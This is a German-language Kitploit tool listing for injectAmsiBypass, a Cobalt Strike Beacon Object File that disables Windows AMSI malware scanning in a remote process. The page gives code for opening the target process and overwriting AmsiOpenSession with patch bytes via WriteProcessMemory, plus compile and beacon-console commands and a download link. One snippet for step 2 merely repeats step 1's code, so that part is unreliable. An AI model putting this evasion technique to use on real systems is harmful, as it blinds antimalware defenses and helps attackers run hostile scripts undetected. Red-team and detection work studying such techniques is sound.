Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
injectAmsiBypass — Cobalt Strike BOF - Umgehen von AMSI in einem entfernten Prozess mit Code-Injektion. | Kitploit
Tools/GitHubGitHub/boku7/injectamsibypass
Exploit-FrameworksPenetrationstestsRed TeamingPayload-Entwicklung
GitHubboku7/injectamsibypass

injectAmsiBypass

Cobalt Strike BOF - Umgehen von AMSI in einem entfernten Prozess mit Code-Injektion.

Repository anzeigen
38069vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cobalt Strike BOF - AMSI-Bypass injizieren

Cobalt Strike Beacon Object File (BOF), das AMSI in einem entfernten Prozess mittels Code-Injektion umgeht.

Ausführen des inject-amsiBypass BOF von CobaltStrike

Was macht das?

1. Verwende das angegebene PID-Argument, um ein Handle auf den entfernten Prozess zu erhalten
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
2. Lade AMSI.DLL in den Beacon-Speicher und ermittle die Adresse von AMSI.AmsiOpenSession
root@kitploit:~
hProc = KERNEL32$OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, (DWORD)pid);
  • Sowohl der Beacon als auch der Zielprozess haben dieselbe Adresse für das Symbol.
  • Falls AMSI.DLL im entfernten Prozess nicht existiert, kann die Ausführung den Zielprozess zum Absturz bringen.
3. Schreibe den AMSI-Bypass in den Speicher des entfernten Prozesses
root@kitploit:~
unsigned char amsibypass[] = { 0x48, 0x31, 0xC0 }; // xor rax, rax
BOOL success = KERNEL32$WriteProcessMemory(hProc, amsiOpenSessAddr, (PVOID)amsibypass, sizeof(amsibypass), &bytesWritten);

Methode = AMSI.AmsiOpenSession

  • Verwendet die AMSI-Bypass-Technik, die im Kurs 'Evasion Techniques and Breaching Defenses' von Offensive Security (PEN-300/OSEP) gelehrt wird.
    • https://www.offensive-security.com/pen300-osep/

Proof-of-Concept-Demo-Screenshots

Vorher - Powershell.exe AMSI.AmsiOpenSession

Nachher - Powershell.exe AMSI.AmsiOpenSession

Kompilieren mit x64 MinGW:

root@kitploit:~
x86_64-w64-mingw32-gcc -c inject-amsiBypass.c -o inject-amsiBypass.o

Ausführen über die Cobalt Strike Beacon-Konsole

root@kitploit:~
beacon> inject-amsiBypass <PID>
  • Stelle sicher, dass das Skript inject-amsiBypass.cna in den Cobalt Strike Script Manager geladen wird.

To-do-Liste

  • Prüfen, ob AMSI.DLL im entfernten Prozess existiert, bevor die Injektion erfolgt
  • Weitere AMSI-Bypässe zum Injizieren hinzufügen
  • Unterstützung für x86

Danksagungen / Referenzen

Raphael Mudge - Beacon Object Files - Luser Demo
  • https://www.youtube.com/watch?v=gfYswA_Ronw
Cobalt Strike - Beacon Object Files
  • https://www.cobaltstrike.com/help-beacon-object-files
Referenzen zu BOF-Code
ajpc500/BOFs
  • https://github.com/ajpc500/BOFs/
trustedsec/CS-Situational-Awareness-BOF
  • https://github.com/trustedsec/CS-Situational-Awareness-BOF
Sektor7 Malware Dev Essentials Kurs
  • https://institute.sektor7.net/red-team-operator-malware-development-essentials
Offensive Security OSEP
  • https://www.offensive-security.com/pen300-osep/
Tool herunterladen